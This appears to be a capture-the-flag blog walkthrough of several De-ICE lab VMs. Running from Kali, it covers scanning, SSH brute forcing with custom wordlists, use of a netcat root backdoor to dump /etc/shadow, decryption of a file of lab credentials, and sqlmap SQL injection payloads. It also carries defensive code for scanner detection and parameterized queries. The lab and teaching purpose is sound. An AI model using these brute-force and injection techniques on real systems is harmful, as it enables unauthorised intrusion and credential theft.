[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.13 - 2.6.32
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: slax.example.net; OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds

In a normal penetration test, if this was the only host in scope, I would dig through the FTP and HTTP sites for data in parallel with performing vulnerability identification. We have used the Nikto web vulnerability scanner in the past and will use it again for this test. Nikto uses a custom User-Agent string, Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID). This can be changed in the /etc/nikto.conf file, or the scan can be piped through the Burp proxy, which can be used to change the User-Agent. Most network security appliances and hardened web servers will not give good results to Nikto scans, since it is known bad traffic.

nikto -h 192.168.1.20

http://192.168.1.20/info.php has good info. An exposed /info.php page is a good find on any test and will usually end up as a finding in the penetration test report.
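Seen from the server side, this is the detection the post says appliances already do. This is an added Python example, not code from the original post: it parses Apache combined-format access log lines, flags the stock Nikto User-Agent, and also flags any client that racks up more than a handful of 404s, which still catches a scan whose User-Agent was rewritten through nikto.conf or Burp; the log lines, addresses and Nikto version in it are constructed.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# The stock Nikto User-Agent quoted above: Mozilla/5.00 (Nikto/@VERSION) (Evasions:...) (Test:...)
NIKTO_UA = re.compile(r"\(Nikto/[^)]*\)", re.IGNORECASE)


def detect_scanners(lines, max_404=5):
    """Return {client_ip: [reasons]} for clients that look like a web scanner.

    Two independent signals: the default Nikto User-Agent, and a burst of 404s,
    which still shows up when the UA has been rewritten because the scan probes
    hundreds of paths that do not exist on the server."""
    reasons = defaultdict(set)
    not_found = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than crash the detector
        if NIKTO_UA.search(m["ua"]):
            reasons[m["ip"]].add("default Nikto User-Agent")
        if m["status"] == "404":
            not_found[m["ip"]] += 1
    for ip, n in not_found.items():
        if n > max_404:
            reasons[ip].add(f"{n} responses with status 404")
    return {ip: sorted(r) for ip, r in reasons.items()}


def _line(ip, sec, path, status, ua):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [06/Apr/2017:00:08:{sec:02d} -0400] "GET {path} HTTP/1.1" '
            f'{status} 209 "-" "{ua}"')


NIKTO = "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"  # version constructed
BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0"

# Constructed sample log: a stock Nikto run, the same scan from another host with
# the UA rewritten, and one ordinary visitor who hit a single missing favicon.
SAMPLE_LOG = [
    _line("192.168.1.128", 1, "/info.php", 200, NIKTO),
    _line("192.168.1.128", 2, "/~root/", 200, NIKTO),
    *[_line("192.168.1.129", 10 + i, f"/missing{i}/", 404, BROWSER) for i in range(7)],
    _line("192.168.1.60", 30, "/index.html", 200, BROWSER),
    _line("192.168.1.60", 31, "/favicon.ico", 404, BROWSER),
]

if __name__ == "__main__":
    for ip, why in detect_scanners(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(why))
```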

Logging into the FTP site as anonymous throws an error, so there is no viable path there.

Connected to 192.168.1.20.
220 (vsFTPd 2.0.4)
Name (192.168.1.20:root): anonymous
230 Login successful.
ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek

In parallel, start a password attack on SSH using rockyou and root. See the S1.100 tutorial for info on how to set it up. While the brute force attack runs, let’s look at some other low-hanging fruit.

Let’s start by looking at the SMTP server.

use auxiliary/scanner/smtp/smtp_enum

The SMTP server pops back some good info, so let’s follow that rabbit hole down. We have one possible username from the website (customerserviceadmin@nosecbank.com). Let’s build out a list for potential attacks.

customerserviceadmin
customeradmin
csadmin
adm
bin
daemon
dbadmin
ftp
gdm
operator
postmaster
sysadmin
webmaster

After some time passes you should get a password back. I used xHydra to show the GUI interface, but any password cracking tool will work.

[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.1.20:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.20:22
[22][ssh] host: 192.168.1.20   login: csadmin   password: rocker

SSH to the server using ssh csadmin@192.168.1.20 and rifle through the file system.

csadmin@192.168.1.20's password: 
Linux 2.6.16.
csadmin@slax:~$ ls
mailserv_download/
csadmin@slax:~$ cd mailserv_download/
csadmin@slax:~/mailserv_download$ ls
2010122014234.j12Gqo4H049241  2010122216451.f81Ltw4R010211.part2

Multiple file names … part2 … better figure that out next. Maybe, I can just read the text part with cat.

csadmin@slax:~/mailserv_download$ cat *      
To: csadmin@nosecbank.com
CC: 
Subject: My Son's Birthday
Date: Mon, 20 Dec 2010 14:23:46 +0500
Return-Path: <sdadmin@nosecbank.com>
Delivered-To: csadmin:nosecbank.com@nosecbank.com
Received: (qmail 20281 invoked from network); 20 Dec 2010 09:23:46 -0000
X-Received: from network (192.168.1.123) by mailserv1-3.us6.service.com; 
20 Dec 2010 09:23:46 -0000
Received: from www.nosecbank.com (unknown [198.65.139.34]) by 
srv5.us6.service.com (Postfix) with ESMTP id D98402459DD for 
<csadmin@nosecbank.com>; Mon, 20 Dec 2010 09:23:46 +0000 (GMT)
Message-Id: <2010122014234.j12Gqo4H049241@www.nosecbank.com>
Mime-Version: 1.0
Content-Type: multipart/alternative; 
boundary="---=_NextPart_000_0000_02F24S11.FEPQRE80"
X-Mailer: K-Mail; Build 1.0.5510
Thread-Index: Qw2cWVmE3odZs3TqTTqFvS1e3lexms==
Message: Hey Mark, I am curious if you would be free to come over and 
visit for my son Donovin's birthday tomorrow after work.  I would also 
appreciate if you brought Andy with you as well, because Donny 
really enjoyed playing with him last time he was over.  I know its short 
notice but he is turning 12 and it is special for both him and me. Let 
me know if this works. Thanks!  -Paul

///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////

Let’s build a second attack based on the content of that email.

Username
sdadmin


Passwords
donovin
Donovin
donovin21
Donovin21
donovin98
Donovin98
donovin1221
Donovin1221
donovin122198
Donovin122198
donovin12211998
Donovin12211998
donovin211998
Donovin211998
donovin1998
Donovin1998

Second verse, same as the first. From checking the home folder you know that Fred is the databaser. As a life pro tip, don’t trust people like Fred.

Username
dbadmin

Passwords
databaser
Databaser
databaser1
databaser2
databaser3
databaser4
databaser5
databaser6
databaser7
databaser8
databaser9
databaser0
databaser!
databaser@
databaser#
databaser$
databaser%
databaser^
databaser&
databaser*
databaser(
databaser)
Databaser1
Databaser2
Databaser3
Databaser4
Databaser5
Databaser6
Databaser7
Databaser8
Databaser9
Databaser0
Databaser!
Databaser@
Databaser#
Databaser$
Databaser%
Databaser^
Databaser&
Databaser*
Databaser(
Databaser)
databaser10
databaser11
databaser12
databaser13
databaser14
databaser15
databaser16
databaser17

Hey look, .part1. Let's put all that together. I had to cook this part from another walkthrough because Java programming is not my forte. The code can be found at the bottom of this post; I named the file Decoder.java, but you can be as creative as you want.

javac Decoder.java

java Decoder sysadmin

java Decoder root

Once you find this file (useracc_update.csv.enc), try the openssl decryption used in the earlier De-ICE challenges. Hint: look in the sysadmin profile.

root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-128-cbc decryption password:
bad decrypt
25228:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-256-cbc decryption password:
bad decrypt
25311:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv -k 31/Fwxw+2
root@slax:/home/ftp/incoming# cat user
useracc_update.csv      useracc_update.csv.enc  
root@slax:/home/ftp/incoming# cat useracc_update.csv
ID,Last,First,Email,State,Username,Password,Verifacation Code,Pin code
1000,Carr,Alfred,acarr23@gmail.com,NY,acarr9096,phantom4,952733,490
1001,Karson,William,wkarson53@yahoo.com,NY,wkarson2431,rockallday123,567094,345
1002,Wheeler,Cordy,megawheels98@rocketmail.com,NY,cwheeler5031,goeagles90,462724,631
1003,Smith,Ken,synthesizer_1r@gmail.com,NY,ksmith6253,crystalization,636721,353
1004,Quinn,Cynthia,qcq92@aol.com,NY,cquinn1217,archyandhenry,680247,223
1005,Floyd,Wilson,jukeboxer_4life@gmail.com,NY,wfloyd5931,knockout66,521456,441
1006,Blake,Markus,sil3nt_gunn3r@yahoo.com,NY,mblake6947,268768924,129632,557
1007,Nash,Jillian,wiselife141@aol.com,NY,jnash0934,checkitout1,324672,315
1008,Atkins,Alison,double_a44@hotmail.com,NY,aatkins9087,gogogo123123,457094,124
1009,Oliver,Frank,fog_of_war0001@gmail.com,NY,foliver9385,falconpunch,783143,134
1010,Jones,Edith,msjones677@hotmail.com,NY,ejones7532,chris12345,632620,579
1011,Moore,Cody,aiprojectx@gmail.com,NY,dot_Cipher,crypTrace,101010,1337

That is the last flag. This challenge was personally tough because of all the Java code and encryption involved, which aren’t part of my normal day-to-day penetration tests.


import java.io.*;

/* Password generator from the De-ICE S2.100 hint files. The class is named
   Decoder so that it matches the Decoder.java file name used above (javac
   requires the public class and the file name to agree). The username may be
   given as the first argument (java Decoder sysadmin) or typed at the prompt. */
public class Decoder
{
    public static void main(String[] args)
    {
        try
        {
            System.out.println("[*] Password Generator");
            String input;
            if(args.length > 0)
                input=args[0];
            else
            {
                BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
                System.out.print("[?] Username: ");
                input=in.readLine();
            }
            if(input == null || input.length() == 0)
            {
                System.out.println("[-] Username must not be empty");
                return;
            }
            int[] output=processLoop(input);
            String outputASCII="";
            for(int i=0; i<output.length; i++)
                outputASCII+=(char) output[i];
            System.out.println("[+] Password: " + outputASCII);
        }
        catch(IOException e)
        {
            System.out.println("[-] IO Error Occurred!");
        }
    }
/*input is username of account*/
    public static int[] processLoop(String input)
    {
        int strL = input.length();
        int lChar=(int)input.charAt(strL-1);
        int fChar=(int)input.charAt(0);
        /* encArr = last char, then the username, then the first char */
        int[] encArr = new int[strL+2];
        encArr[0]=(int)lChar;
        for(int i=1;i<encArr.length-1;i++)
            encArr[i]=(int)input.charAt(i-1);
        //encArr[0]=(int)lChar;
        encArr[encArr.length-1] = (int)fChar;
        encArr = backLoop(encArr);
        encArr = loopBack(encArr);
        encArr = loopProcess(encArr);
        /* swap elements from both ends towards the middle */
        int j = encArr.length-1;
        for(int i=0; i<encArr.length; i++){
            if(i == j)
                break;
            int t=encArr[i];
            encArr[i]=encArr[j];
            encArr[j]=t;
            j--;
        }
        return encArr;
    }
/*Note the pseudocode will be implemented with the
root account and my account, we still need to implement it with the csadmin, sdadmin,
and dbadmin accounts though*/
    public static int[] backLoop(int[] input){
        int ref = input.length;
        int a = input[1];
        int b = input[ref-1];
        int ch = (a+b)/2;
        /* shift every value by its position; even positions are first reduced modulo ch */
        for(int i=0;i<input.length;i++){
            if(i%2 == 0)
                input[i] = (input[i]%ch)+(ref+i);
            else
                input[i] = (input[i]+ref+i);
        }
        return input;
    }
    public static int[] loopProcess(int[] input){
        /* remap '(' (40), ')' (41) and '-' (45) to other code points */
        for(int i=0; i<input.length; i++){
            if(input[i] == 40 || input[i] == 41)
                input[i] += input.length;
            else if(input[i] == 45)
                input[i] += 20+i;
        }
        return input;
    }
    public static int[] loopBack(int[] input){
        int ref = input.length/2;
        /* grow the array by half and shift the values right by ref/2 */
        int[] encNew = new int[input.length+ref];
        int ch = 0;
        for(int i=(ref/2); i<input.length; i++){
            encNew[i] = input[ch];
            ch++;
        }
        /* pull everything into printable ASCII, then perturb by position */
        for(int i=0; i<encNew.length; i++){
            if(encNew[i] <= 33)
                encNew[i] = 33+(++ref*2);
            else if(encNew[i] >= 126)
                encNew[i]=126-(--ref*2);
            else{
                if(i%2 == 0)
                    encNew[i] -= (i%3);
                else
                    encNew[i] += (i%2);
            }
        }
        return encNew;
    }
}

I did not find this one on an old hard drive; the only thing I had was the link to the ISO and two empty text files. So this is basically a clean, up-to-date walkthrough using Kali. This one was short and sweet, not too many flags to deal with. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun, and hopefully these are helpful.

SE-ICE S1.123

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.123.iso

Default IP: Hey, look at flag one, slacker

Flags:
1. Find default IP for system
2. Enumerate ports and services
3. Identify web and network vulnerabilities for system
4. Gain root access to system

Spoilers and Walkthrough

We have used a few different tools to find hosts on a subnet, and we will add another one for this test. ARP (Address Resolution Protocol) maps between IP addresses and the physical MAC addresses on a network segment; because it isn’t routed, it is useful for finding systems on the local subnet. There are multiple tools that use ARP for this discovery, but I have chosen arp-scan because it is already installed in Kali and I knew the switch to use.

root@kali:~# arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1    00:50:56:c0:00:08    VMware, Inc.
192.168.1.2    00:50:56:e7:84:3f    VMware, Inc.
192.168.1.123    00:0c:29:1f:c6:f0    VMware, Inc.
192.168.1.254    00:50:56:e7:f4:91    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.420 seconds (105.79 hosts/sec). 4 responded

Now that we know it is the .123 address, let's port scan the image to get started. Once again, we will use the Metasploit console to keep all of our info in one place.

msfconsole
workspace -a de-ice123
workspace de-ice123
db_nmap -T5 -A -p 0-65535 192.168.1.123

That is a lot to work with, so let's narrow it down a bit and get started with some information gathering. Finger will expose user names, and there is a simple scanner for it already built into Metasploit.

use auxiliary/scanner/finger/finger_users
[*] 192.168.1.123:79      - 192.168.1.123:79 No users found.

That didn’t go as well as I had hoped. Let's look at a list of the other open ports.

services
192.168.1.123  901    tcp    http         open   Samba SWAT administration server

Unfortunately, that is behind HTTP basic authentication and we don’t have any credentials to test yet. A little research shows that by default it uses the root account and password for credentials. We can put that in the pile for a brute force attack later. Why am I showing you all of this stuff that doesn’t work? Because welcome to penetration testing. 99% of the things that you find, research, or try will be dead ends. That super sweet exploit the scanner found will either be a false positive, or the local AV will eat the exploit and no amount of encryption and obfuscation will work. But the research you do today about the finger service will pay off in three months when you run into it on another system.

Let's look at the DokuWiki listening on port 80 and see if we can web app pen test this thing. I don’t want to copy all of the results here, but I will paste the command and a few things that piqued my interest.

nikto -h 192.168.1.123
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.

I couldn’t validate the /bin system shell, but one of you smart web app people will probably get that. Manually looking through those pages with a browser might give you an idea of a few things that we will do later on. Since we have already used Nmap we can check that one off the list. I will use sqlmap next, since we might be able to inject the ?id= parameter. Using the wizard isn’t 1337 H4x0r, but it is an easy test, so there is no reason to use Burp to capture a request.

root@kali:~# sqlmap --wizard

[22:43:57] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.1.123/doku.php?id=netcat
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 3

No luck, so if there is a SQL injection it is more obscure or needs some additional testing. Since the wiki talks about netcat, let's see if that is a hint. There are two interesting ports, based on their numbering, to look at: 1337 and 31337. As a penetration tester, DON’T DO THIS. Don’t try to be clever and show you are an elite hacker; also change the default port on your Meterpreter shells. Be professional: 4444 and 1337 raise a lot of red flags on an IDS that 8080 and 8443 won’t. For readability I’ve bolded my command inputs.

root@kali:~# nc -vv 192.168.1.123 1337
192.168.1.123: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.123] 1337 (?) open
id
uid=0(root) gid=0(root)
cd ..
ls
bin
dev
etc
home
lib
mnt
opt
proc
root
sbin
sys
tmp
usr
var
cd ..
pwd
/
cd etc
cat shadow
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
cat passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:

Let's validate that we have SSH access after cracking that hash. You already cracked that hash with John, right?

msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.128:36105 -> 192.168.1.123:22) at 2017-04-13 23:34:37 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

We are root on the system through a netcat shell. On a real penetration test this would be a bad finding; this is where you actually stop testing and call your contact to tell them someone else has compromised their systems. Could it be a really bad system administrator who decided that adding a wildly unsecured access method was a good idea? Yes. Could it be a malicious attack? Yes. In this case you would grab a screenshot for your report and send up a flare to your client. Who knows, maybe you will get extra billable hours to clean it off.

I dug around on the rest of the system looking for other flags but didn’t find any data to manipulate. Based on the age of the PHP and Apache installs, there are probably lots of vulnerabilities that can be exploited on this system.

While digging through an old external drive I found the De-ICE LiveCDs and the walkthrough text files I had put together a few years ago. They are really simple: each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun, and hopefully these are helpful.

SE-ICE S1.120

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso

Default IP 192.168.1.120

Flags:
1. Create list of open ports
2. This is primarily a web penetration test; act accordingly
3. Obtain access to file system
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: Rummage about in the file system

Spoilers and Walkthrough

Port scan the image to get started.

root@SNM-KScan-2:~# nmap -sV -T4 192.168.1.120

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-07 13:53 MST
Nmap scan report for 192.168.1.120
Host is up (0.00047s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:A4:37:1E (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds

This is primarily a vulnerable web app, so I started working with HTML injection on the http://192.168.1.120/add_product.php page:
<h1>htmlinjection</h1>
<h1>htmlinjection1</h1>
<h1>htmlinjection2</h1>
Normally, if you can get HTML injection it is possible to get XSS if you can bypass whatever filter is in place. I only use the number to keep track of which injection actually worked. I used Burp to capture the request, then saved it and loaded it into sqlmap. The -r is the file I saved the request to and -p is the name of the parameter to attack.

sqlmap -r /root/Desktop/deice/120webrequest -p price

No joy, so let's hit it a little harder.

sqlmap -r /root/Desktop/deice/120webrequest -p price --level=5 --risk=3

Nope. Let's try the other parameters.

sqlmap -r /root/Desktop/deice/120webrequest -p product --level=5 --risk=3
sqlmap -r /root/Desktop/deice/120webrequest -p description --level=5 --risk=3

I might have busted it, but there is another parameter here you can test. Feed the id parameter from http://192.168.1.120/products.php?id=1 to sqlmap using the --wizard option, or save the request and point -r at it:

sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

root@SNM-KScan-2:~# sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:43:07

[14:43:07] [INFO] parsing HTTP request from '/root/Desktop/deice/120webrequest2'
[14:43:07] [INFO] testing connection to the target URL
[14:43:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:43:08] [INFO] target URL is stable
[14:43:08] [INFO] testing if GET parameter 'id' is dynamic
[14:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[14:43:08] [INFO] GET parameter 'id' is dynamic
[14:43:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[14:43:09] [INFO] testing for SQL injection on GET parameter 'id'
[14:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:43:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

BOOM goes the dynamite! And now we wait while sqlmap handles its business. If you don’t want to mess with Burp, the same command is:

sqlmap --banner --dbms=mysql -u "http://192.168.1.120/products.php?id=1"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:05:47

[09:05:47] [INFO] testing connection to the target URL
[09:05:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:05:48] [INFO] target URL is stable
[09:05:48] [INFO] testing if GET parameter 'id' is dynamic
[09:05:49] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:49] [INFO] GET parameter 'id' is dynamic
[09:05:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[09:05:49] [INFO] testing for SQL injection on GET parameter 'id'
[09:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:49] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[09:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:05:49] [INFO] testing 'MySQL inline queries'
[09:05:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:05:49] [WARNING] time-based comparison requires larger statistical model, please wait..................                                          
[09:05:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:06:00] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[09:06:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:06:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:06:00] [WARNING] reflective value(s) found and filtering out
[09:06:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1082=1082

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[09:06:14] [INFO] the back-end DBMS is MySQL
[09:06:14] [INFO] fetching banner
[09:06:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:06:14] [INFO] retrieved: 5.1.33
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
banner:    '5.1.33'
[09:06:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 09:06:16
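The boolean-based blind injection sqlmap just reported, as an added Python example that is not part of the original walkthrough: a stand-in for the products.php lookup written the vulnerable way beside a parameterized fix, and the baseline/true/false comparison sqlmap performs before it prints "seems to be 'AND boolean-based blind' injectable". SQLite stands in for the MySQL backend and the table contents are constructed; the payloads are the ones from the output above.

```python
import sqlite3

# Constructed stand-in for the products table behind products.php?id=1.
PRODUCTS = [(1, "widget", 9.99), (2, "gadget", 19.99), (3, "gizmo", 4.50)]


def make_db():
    """In-memory SQLite database playing the role of the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, product TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def products_vulnerable(conn, id_param):
    """products.php-style lookup: the raw id parameter is concatenated into
    the SQL text, so 'id=1 AND 1082=1082' becomes part of the WHERE clause."""
    sql = "SELECT product FROM products WHERE id=" + id_param
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def products_fixed(conn, id_param):
    """Hardened lookup: the parameter must be an integer literal and is passed
    as a bound value, so the injected condition never reaches the parser."""
    if not id_param.isdigit():
        return None
    row = conn.execute("SELECT product FROM products WHERE id=?",
                       (int(id_param),)).fetchone()
    return row[0] if row else None


def detect_boolean_blind(conn, handler, base="1"):
    """The check behind sqlmap's 'AND boolean-based blind - WHERE or HAVING
    clause' finding: a true condition appended to a valid id must leave the
    response unchanged while a false condition must change it. Returns True
    when the handler behaves that way, i.e. when it is injectable."""
    baseline = handler(conn, base)
    true_resp = handler(conn, base + " AND 1082=1082")   # payload sqlmap reported
    false_resp = handler(conn, base + " AND 1082=1083")  # its false counterpart
    return baseline is not None and true_resp == baseline and false_resp != baseline


if __name__ == "__main__":
    db = make_db()
    for name, handler in (("concatenated", products_vulnerable),
                          ("parameterized", products_fixed)):
        verdict = "injectable" if detect_boolean_blind(db, handler) else "not injectable"
        print(f"[*] {name} handler: {verdict}")
```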

It is time to get down on the database.

sqlmap --dbms=mysql -u "http://192.168.1.120/products.php?id=1" --users --passwords -o --threads=8 --time-sec=1

****Partial output. This takes a while****
database management system users [50]:
[*] 'aadams'@'localhost'
[*] 'aallen'@'localhost'
[*] 'aard'@'localhost'
[*] 'aharp'@'localhost'
[*] 'aheflin'@'localhost'
[*] 'amaynard'@'localhost'
[*] 'aspears'@'localhost'
[*] 'aweiland'@'localhost'
[*] 'bbanter'@'localhost'
[*] 'bphillips'@'localhost'
[*] 'bwatkins'@'localhost'
[*] 'cchisholm'@'localhost'
[*] 'ccoffee'@'localhost'
[*] 'dcooper'@'localhost'
[*] 'dgilfillan'@'localhost'
[*] 'dgrant'@'localhost'
[*] 'djohnson'@'localhost'
[*] 'dstevens'@'localhost'
[*] 'dtraylor'@'localhost'
[*] 'dwestling'@'localhost'
[*] 'hlovell'@'localhost'
[*] 'jalcantar'@'localhost'
[*] 'jalvarez'@'localhost'
[*] 'jayala'@'localhost'
[*] 'jbresnahan'@'localhost'
[*] 'jdavenport'@'localhost'
[*] 'jduff'@'localhost'
[*] 'jfranklin'@'localhost'
[*] 'kclemons'@'localhost'
[*] 'krenfro'@'localhost'
[*] 'ktso'@'localhost'
[*] 'kwebber'@'localhost'
[*] 'lmartinez'@'localhost'
[*] 'lmorales'@'localhost'
[*] 'mbryan'@'localhost'
[*] 'mholland'@'localhost'
[*] 'mnader'@'localhost'
[*] 'mrodriguez'@'localhost'
[*] 'myajima'@'localhost'
[*] 'qpowers'@'localhost'
[*] 'rdominguez'@'localhost'
[*] 'rjacobson'@'localhost'
[*] 'rpatel'@'localhost'
[*] 'sgains'@'localhost'
[*] 'sjohnson'@'localhost'
[*] 'strammel'@'localhost'
[*] 'swarren'@'localhost'
